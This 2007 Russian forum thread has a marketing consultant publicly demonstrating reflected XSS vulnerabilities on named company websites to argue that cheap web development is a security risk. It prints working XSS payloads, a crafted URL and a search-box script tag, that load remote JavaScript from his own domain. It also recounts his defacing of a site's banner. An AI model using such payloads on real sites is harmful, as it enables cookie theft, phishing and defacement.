 |
|
|
 |
|
|
|
| Ответ анонимам с adlife.spb.ru |
|
Алексей Новиков
Повышаем эффективность сайтов
Постов: 416
Дата регистрации: 18.10.2006 |
В продолжение недавней истории о сайте «Максидома». (http://adlife.spb.ru/blog/?pageid=2&blog=103894&id=115415) Краткое содержание предыдущей серии: вместо того, чтобы признать дефект на сайте, Общество Анонимных Комментаторов поставило под сомнение справедливость моих слов (и еще много чего другого). Мол, вывели на страницу слово «ой», так это дальше ничем не грозит.
Специально для вас, уважаемые читатели, я подготовил более наглядную демонстрацию того, к чему может привести недостаточная квалификация или лень разработчиков. За примерами ходить далеко не пришлось. Вы догадываетесь, в чьем портфолио я достал пару сайтов для экзекуции? Это было нетрудно.
Нажмите на ссылку и подождите секунд пять. Остальное прочитаете уже там. Потом вернитесь сюда и дочитайте текст до конца.
http://www.creative-industries.spb.ru/pa...v.ru%2Fxss%2Fxss.js%3E%3C%2Fscript%3E
Какое отношение это имеет к рекламе?
Имеет. Точно такое же, какое имеют к рекламе (и не только) сайты и интернет вообще. У кого-то сомнения?
Во-первых, рекламные агентства частенько заказывают сайты субподрядчикам или даже сами делают их. В лучшем случае это будет «полиграфическая болезнь», когда сайт похож на буклет и нефункционален. А что, у нас же есть свои дизайнеры, какая разница: сайт или флаер?
Во-вторых, рекламодатели заказывают сайты и недоумевают, когда им озвучивают цифру в несколько тысяч у.е. Зачем платить 4000 долларов, когда есть конторки, массово штампующие такие сайты по штуке баксов? У некоторых в портфолио бывают довольно известные заказчики (как они туда угодили, другой вопрос).
У большинства клиентов или рекламных агентств нет осознания, за что платить 4000 баксов, заказывая сайт: «Вот листовок напечатать или щит у дороги заказать, это понятно. А сайт не пощупаешь. Да что там мудрить, каждый школьник ведь себе сайт уже сделал. И ваще, нам ентот интырнет тока для галочки, потому что на визитке напечатано».
При этом находятся люди, утверждающие, что «ничего страшного» и задающие вопросы «а чем плох данный сайт». Да, пока у вас не похитили пароль, базу клиентов, не разослали с вашего сайта спам или вирусы, то ничего страшного ? Можете продолжать называть это «функциональностью, недоступной моему пониманию», или принимать это за «вирусный маркетинг», это нынче модно.
Когда идет обсуждение вывески, читатели AdLife знают про щели, образующиеся на стыках при перепаде температур. Но почему-то, когда показывают щели в интернет-сайтах, появляются вопросы: «А чем это плохо?»
Добавки?
Хотите узнать, как выявить подобные уязвимости на своем сайте? Тогда продолжим. Есть в Питере известная IT-компания Ramec. Откройте в новом окне ссылку http://www.ramec.ru. Введите в строку поиска нижеследующий текст и нажмите Enter, да подождите секунд пять ;)
< script src="h**p://drnovikov.ru/ramec/xss.js">< /script>
(Уберите пробелы перед "script" и "/script" и замените "*" на "t")
Догадаетесь с трех раз, кто творец? Подсказка скрыта в коде страницы.
Перед тем, как комментировать, ознакомьтесь с альтернативными источниками, в которых подробно описано, почему это не «функциональность», а уязвимость аж с 1997 года:
http://team-madalf.com/index.php?act=Print&client=printer&f=42&t=7739
http://cf-team.net/content/view/15/30/
http://www.cgisecurity.com/articles/xss-faq.shtml
Ситуация, когда посторонний может запустить на страницах вашего сайта чужеродный скрипт, недопустима! И обсуждать тут нечего.
Надеюсь, теперь рекламисты будут уделять побольше внимания вопросам качества сайтов, в том числе их безопасности. |
|
 |
0 |
 |
0 |
| Комментарий понравился? |
|
0 |
|
0 |
    12.02.2007 14:56 |  |
|
|
|
ex Swayvill
Постов: 1630
Дата регистрации: 16.04.2004 |
что-то с кодом в поиске ничего не получилось..
+ вопрос: каким образом можно обезопаситься от этого, или для начала, как обнаружить, что брешь имеется? |
|
--------
"Жила-была четвероногая ворона. Собственно говоря, у нее было пять ног, но об этом
говорить не стоит." (c) Д.Хармс
|
|
0 |
|
0 |
| Комментарий понравился? |
|
0 |
|
0 |
12.02.2007 15:19 | |
|
|
|
Алексей Новиков
Повышаем эффективность сайтов
Постов: 416
Дата регистрации: 18.10.2006 |
С кодом -- на ramec.ru уже залатали.
Еще я сегодня с согласия Aldife.spb.ru поменяли им на короткое время логотип и поставил с него ссылку на сиськи-сайт.
Обнаружить можно, например, подставляя такую строку в разные поля формы. Впрочем, для Adlife мне пришлось применить другую тактику.
Обезопаситься -- это уже к программистам. Я не программер, эти штуки делаю примерно с пятницы :) Но если даже я (хирург по образованию, работающий консультантом по интернет-маркетингу), смог, то и хакеры точно смогут. А ведь еще есть масса уязвимостей, о которых я-то толком не знаю.
Полагаю, надо просто заказывать внешний аудит безопасности сайта и предусматривать в договоре сроки бесплатного исправления. |
|
|
0 |
|
0 |
| Комментарий понравился? |
|
0 |
|
0 |
12.02.2007 15:47 | |
|
|
|
Алексей Новиков
Повышаем эффективность сайтов
Постов: 416
Дата регистрации: 18.10.2006 |
Поразительно! Спустя несколько лет и несколько часов они залатали-таки дыры. Для тех, кто не успел на концерт: при заходе на эти сайты по сформированной мною ссылке люди видели вот это: http://drnovikov.ru/xss/
Кстати, на первом сайте по-прежнему висит видимая глазом орфографическая ошибка. Надо полагать, с самого 2004 года там написано "creStive" вместо "creative"
Copyright: 2004 Crestive Industries Development Center
Браво!
Сколько еще сайтов за 100 баксов надо распять, чтобы народ пошевелился? :) |
|
|
0 |
|
0 |
| Комментарий понравился? |
|
0 |
|
0 |
12.02.2007 15:57 | |
|
|
|
CMS Maker
Постов: 2504
Дата регистрации: 24.11.2005 |
| для: Микромаркетинг© на самом деле, ошибка не критичная для уязвимости. |
|
|
0 |
|
0 |
| Комментарий понравился? |
|
0 |
|
0 |
12.02.2007 16:05 | |
|
|
|
Алексей Новиков
Повышаем эффективность сайтов
Постов: 416
Дата регистрации: 18.10.2006 |
Pelvis, посмотрите в тех статьях, ссылки на которые я дал. Вы считаете, что спереть cookies у админа и получить доступ к сайту не критично? Или подставить юзерам ложную страницу, да собрать у них логины-пароли, пин-коды, номера кредиток?  |
|
|
0 |
|
0 |
| Комментарий понравился? |
|
0 |
|
0 |
12.02.2007 16:43 | |
|
|
|
Arbeit macht frei
Постов: 7061
Дата регистрации: 04.03.2005 |
для: Микромаркетинг©
Забавная фича  Теперь я понял, что имел ввиду Cossack, когда года три назад говорил, что нашел способ получать безответные ссылки с сайтов помимо их желания
Это работает только в строке поиска или еще и в полях отправки форм запросов или страниц адурла? |
|
|
0 |
|
0 |
| Комментарий понравился? |
|
0 |
|
0 |
12.02.2007 19:26 | |
|
|
|
Алексей Новиков
Повышаем эффективность сайтов
Постов: 416
Дата регистрации: 18.10.2006 |
Это работает там, где движок сайта позволяет вывести на страницу введенные посетителем данные без их обработки. Судя по литературе, есть 2 типа XSS-атак. Непостоянная атака, когда мне надо кинуть админу особый URL и постоянная, например, если я в гостевухе смогу такое вывести. Пользователи не будут даже предполагать, что их куки кто-то заботливо собирает. :-)
Собственно, такую возможность я обнаружил на самом Adlife и устроил демонстрацию (предварительно позвонив им и известив). Поменял им баннер на свой, а ссылку с логотипа поставил на сиськи-сайт :-) Шороху у них было, говорят...
Хотите знать, что ответил мне некто, подписавшийся "Владимир Воскресенский" (так же зовут гендиректора конторы, сделавшей сайт Максидому и эти два сайта, которые я показал).
Вот его слова: «Вы весьма невнимательны (либо СПЕЦИАЛЬНО НЕВНИМАТЕЛЬНЫ) - иначе бы обратили внимание на то. что система урпавления сайтом, установленная web-студией интернет-агентства "В*****" в этот сайт позволяет специалистам "М********" ПОЛНОСТЬЮ управлять не только содержанием, но и ФУНКЦИОНАЛЬНОСТЬЮ САЙТА, и эта функциональность, видимо недоступна восприятию некоторых "экспертов"...»
Проще говоря, это не брак, а недоступная мне, неучу, функциональность. Стоит отметить: большинство рекламистов действительно не понимают, что это — потенциальная опасность. Кто-то даже утверждал, будто это «вирусный маркетинг».
Впрочем, надо там коменты смотреть, рекламисты и анонимы жгут: http://adlife.spb.ru/blog/?pageid=2&blog=103894&id=115415 |
|
|
0 |
|
0 |
| Комментарий понравился? |
|
0 |
|
0 |
12.02.2007 20:21 | |
|
|
|
CMS Maker
Постов: 2504
Дата регистрации: 24.11.2005 |
| На самом деле, куки у юзверей можно и через флэш-анимацию стянуть. Конечно же, надо всегда защищать сайт, что наши программисты и делают в первую очередь (к слову, я от них остаю и не всегда успеваю новые проекты роботсом закрыть) |
|
|
0 |
|
0 |
| Комментарий понравился? |
|
0 |
|
0 |
13.02.2007 20:03 | |
|
|
|
Постов: 605
Дата регистрации: 02.03.2004 |
А в чем пафос?
Сайты за 4000 избавлены от недостатков?
Да дыры постоянно находятся в любом ПО. Это данность. |
|
|
0 |
|
0 |
| Комментарий понравился? |
|
0 |
|
0 |
14.02.2007 12:17 | |
|
|
|
Алексей Новиков
Повышаем эффективность сайтов
Постов: 416
Дата регистрации: 18.10.2006 |
Ауди за 70000 тоже не полностью избавлены от недостатков, но в них недостатков куда меньше, чем в "десятках", правда?
Дыры есть в любом ПО, согласен. Взломать можно любую дверь, так что, теперь ставить самые дешевые? Дверь с замком взломать тяжелее ;) |
|
|
0 |
|
0 |
| Комментарий понравился? |
|
0 |
|
0 |
15.02.2007 14:48 | |
|
|
|
 | Только зарегистрированные пользователи могут оставлять сообщения в этом форуме |
|
|
|
|
|
© "ООО Состав.ру" 1998-2024
тел/факс: +7 495 225 1331 адрес: 109004, Москва, Пестовский пер., д. 16, стр. 2
При использовании материалов портала ссылка на Sostav.ru обязательна!
Администрация Sostav.ru просит Вас сообщать о всех замеченных технических неполадках на E-mail
|
|
|
|
